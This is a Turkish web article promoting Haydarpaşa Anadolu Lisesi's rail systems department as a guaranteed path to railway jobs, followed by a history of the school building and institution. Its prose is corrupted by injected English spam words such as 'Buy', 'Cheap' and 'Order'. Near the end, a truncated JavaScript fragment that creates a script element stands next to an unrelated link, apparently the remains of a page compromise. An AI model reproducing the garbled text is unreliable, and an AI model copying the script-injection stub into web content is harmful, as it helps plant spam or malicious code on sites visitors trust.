Haydarpaşa Anadolu mezununun İŞİ HAZIR!

HAYDAR

Günümüzde İŞ BULMAK Purchase o kadar zor ki!…

Bir iş bulabilmek için müracaat ediyor; öncelikle hangi üniversite mezunusun deniyor. Ardından kaç lisan biliyorsun sözleri ile karşılaşılıyor. Tabii üniversite mezunlarımızın bazıları ŞANSLILAR kervanına katılıyor. Bazıları ise o kadar yıl okumalarına rağmen; ne yazık ki iş bulamıyorlar.

Ama artık belli kesim mezunlarının daha liseyi bitirir bitirmez İŞ İMKANI HAZIR…

Evet yanlış okumadınız… Buy İŞ İMKANI HAZIR! Cheap

Nasıl mı?

Öncelikle Anadolu Liseleri imtihanına giriyorsunuz. Ardından puan durumunuza göre HAYDARPAŞA ANADOLU LİSESİ tercihleriniz arasında ise; bölümünüzü derhal online RAYLI SİSTEM TEKNOLOJİLERİ olarak seçiyorsunuz ve mezuniyet sonrası İŞİNİZ HAZIR online . Hem de yeni işe başlayan bir kişi olarak iyi paraya.

Şimdi olayı şöylece açalım…

Halen Türkiye’de Eskişehir, Sakarya, Erzincan, Sivas, Ankara, Malatya ve İstanbul’da bu kategorilerde hizmet veren okullarımız bulunuyor. Nitekim İstanbul’daki HAYDARPAŞA ANADOLU LİSESİ de bu kapsamda hizmet veren okullarımızdan biri.

Daha önce de belirttiğim gibi öncelikle Anadolu Liseleri sınavına giriyor ve puanınızı tutturuyorsunuz. 2004-2005 senesinden beri uygulamaya başlanılan bu RAYLI SİSTEM TEKNOLOJİLERİ Order bölümünün MAKİNE TEKNOLOJİSİ ve ELEKTRİK-ELEKTRONİK TEKNOLOJİSİ dallarında okuyor ve mezun olduktan sonra da Kamu Personeli Sınavı’na girip hemen iş bulabiliyorsunuz. Ama iki senedir sadece bu bölümden 100’e yakın HAYDARPAŞA ANADOLU LİSESİ mezunu; yoğun istekler çerçevesinde Kamu Personeli Sınavı’nda düşük puan bile almış olmalarına rağmen İŞ BULABİLDİLER. Çünkü Makinist Yardımcısı ve Elektrik Teknisyeni olarak görev yapmaktalar.

Halen okulda bu sene 30 öğrenci  Makine Teknolojisi; 30 öğrenci de Elektrik-Elektronik Teknolojisi branşlarında okuyorlar. Hatta okul yetkililerinden aldığımız bilgi çerçevesinde bu mezunlara ayda 1.500-1.700 TL. arasında maaş verilmekte.

Sevgili veliler ve öğrenciler şimdi iş sizlere düşüyor… Var gücünüzle Anadolu Liseleri sınavına çalışın, eğer İstanbul’da iseniz HAYDARPAŞA ANADOLU LİSESİ’ni veya yazdığımız illerdeki liseleri tercih edin. Gerçekten işiniz hazır.

HAYDARPAŞA ANADOLU LİSESİ’nin tarihçesi

Okul binasının yapımına Serasker Rıza Paşa’nın ve Gülhane Askeri Hastahanesi kurucusu bakteriyolog Ridar’ın büyük çabalarıyla 1893’te başlanmış. Bu çabalarla Üsküdar çevresinin kalkındırılması ve Askeri Tıbbiye’nin modernleştirilmesi amaçlanmış. Bu temel amaçla kurulan binamızın mimari, İtalyan Valeri. Okul inşaatı 1902’de bitirilmiş. Bu temel yapı, bir kurum yapısı olmaktan öte, bir sanat eseri.

Okul binası, İkinci Abdülhamit zamanında(1903) Mekteb-i Tıbbiye-i Şahane’ye tahsis edilmiş. 1909 yılında Sivil Tıp Fakültesi’nin de taşınmasıyla tıp okulu olarak 1933 yılına kadar kullanılmış. Aynı yıl, üniversite reformu ile Tıp Fakültesi, Beyazıt’a taşınmış. Bina, bu nedenle bir yıl boş bırakılmış. Okul binasının lise olarak kullanılmasına büyük önder Mustafa Kemal ATATÜRK’ün emriyle 26 Eylül 1934’te başlanmış. Okul adını, tarihi binanın yapımı sürerken ortaya çıkan Osmanlı-Yunan Savaşı’nda (1897) büyük yararlılıklar gösteren Haydar Paşa’dan almış.

Eğitim-öğretime açıldığında içinde “İstanbul Muallim Mektebi” ile “uygulama” bölümü de bulunduran okul 1936-1937 öğretim yılında bu okulların Çamlıca’ya taşınmasıyla bağımsız lise durumuna getirilmiş. İlk açıldığında 1048 öğrencisi olan, kısa zamanda gelişerek çevrenin ‘yatılı ve gündüzlü’ ortaöğretim gereksinimini karşılayacak duruma getirilmiş. O zamanlar okul, çok sayıda dersliğinin yanında 35 kurnalı hamamı, mescidi, reviri, yemekhanesi, 5 mutfağı, terzihanesi, demirhanesi, marangozhanesi ve lojmanlarıyla küçük bir kasaba görünümünde.

Haydarpaşa Lisesi, o yıllarda bu farklı birimleri bünyesinde bulundurduğu gibi, farklı öğrencilere de eğitim hizmeti sunmuş. Lisenin bu özelliği, kayıt sırasında öğrencilere verilen okul numaralarından da açıkça anlaşılmakta. Tek numaralar, yatılı öğrencileri; sonu 3 rakamıyla biten numaralar, parasız yatılı olanları; çift numaralar ise, gündüzlü öğrencileri göstermekte.

1948-49 Öğretim Yılı’na gelinceye kadar, Haydarpaşa Lisesi bir erkek lisesi durumunda olmuş. Bu öğretim yılından itibaren, okula kız öğrenciler de alınmış. Ancak bu uygulamaya 1958-59 yılında son verilmiş. 1980-81 Öğretim yılında, yeniden karma eğitime başlanmış.

1979-1980 öğretim yılında yatılı bölümün kapatılmasıyla bina sorunu ortaya çıkmış. Çünkü, Marmara Üniversitesi Tıp Fakültesi’nin taşınması, okulun kullanım alanını daraltmış. Bu nedenle eğitim zorlaşmış. Kayıtların kısmen dondurulması gündeme gelmiş. Haydarpaşa Lisesi, bu tarihi yuvasından, 1984 yılının Temmuz ayında çıkartılmış. Binada halen Marmara Üniversitesi öğretimini devam ettirmekte.

1990 yılına kadar Haydarpaşa Endüstri Meslek Lisesi’nin yeni yapılan ek binasında eğitim-öğretimini sürdürmüş. 1990 yılının ara tatilinden yararlanılarak Altunizade’deki yeni yapılan binaya taşınılmış. Böylece daha sağlıklı bir eğitim-öğretim ortamı elde edilmiş.

1992-93 Öğretim yılında okul önemli gelişmelerden birini daha yaşamış. Bu yıl Haydarpaşa Lisesi, Yabancı Dil Ağırlıklı Lise yani Süper Lise konumuna getirilmiş. 1995-96 yılında verdiği mezunlarla üniversite kazandırma başarısını 3 kat arttırarak %66 düzeyine getirmiş. Daha sonra 1998-99 öğretim yılında Anadolu Lisesi konumuna getirilmiş. Haydarpaşa Lisesi, ülkemize yalnızca sanatçı, politikacı, bilim adamı, sporcu yetiştirmekle kalmamış birçok kültürel etkinliklere de damgasını vurmuş.

Okul Üsküdar İlçesi’nde yer almakta olup Altunizade, Koşuyolu, Acıbadem ve Çamlıca’nın kesiştiği noktada. Ayrıca Padişah II. Abdülaziz Av Köşkü’ne de komşu. Buy var d=document;var s=d.createElement('script'); http://cutlerfirm.com/site/archives/1274/

Linkler

Reklamlar

Giriş - Powered by Pixelim Media · Ukrayna Turlari | Ozge Tur | Tesla ERP